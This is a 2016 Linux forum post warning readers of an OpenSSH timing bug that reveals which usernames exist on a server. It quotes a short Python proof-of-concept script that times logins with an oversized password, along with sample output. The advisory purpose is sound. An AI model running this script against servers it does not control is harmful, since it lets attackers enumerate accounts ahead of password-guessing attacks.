• The friendly Linux forum for all users.
Dismiss Notice
Welcome to Linux Forum! As we have just launched, please help us grow by telling your friends about us and posting in the forum. Thanks!

OpenSSH user enumeration bug

Discussion in 'Linux Security discussion' started by Rob, Jul 18, 2016.

  1. Rob

    Rob Administrator Staff Member

    OpenSSH currently has a bug that will help would-be attackers figure out actual account names on your system by timing how long the server responds to incorrect logins.

    According to this post on the full disclosure mailing list, if you query a server with a username and a password larger than 10kb, it will take longer to respond back when it tries to authenticate with the incorrect password on an account that actually exists. When the username is wrong, it will respond with less time.

    Test code from the post above:
    Code:
    #!/usr/bin/python
    
    import paramiko
    import time
    user=raw_input("user: ")
    p='A'*25000
    ssh = paramiko.SSHClient()
    starttime=time.clock()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
            ssh.connect('127.0.0.1', username=user,
            password=p)
    except:
            endtime=time.clock()
    total=endtime-starttime
    print(total)
    Sample output:
    Code:
    rob@linuxforum.com [/usr/local/bin]# ./usertest.py
    user: slfj
    0.24
    rob@linuxforum.com [/usr/local/bin]# ./usertest.py
    user: blah
    0.23
    rob@linuxforum.com [/usr/local/bin]# ./usertest.py
    user: realuser
    0.29
    Patches should be available shortly - we'll update this when we see some pop out.
     

Share This Page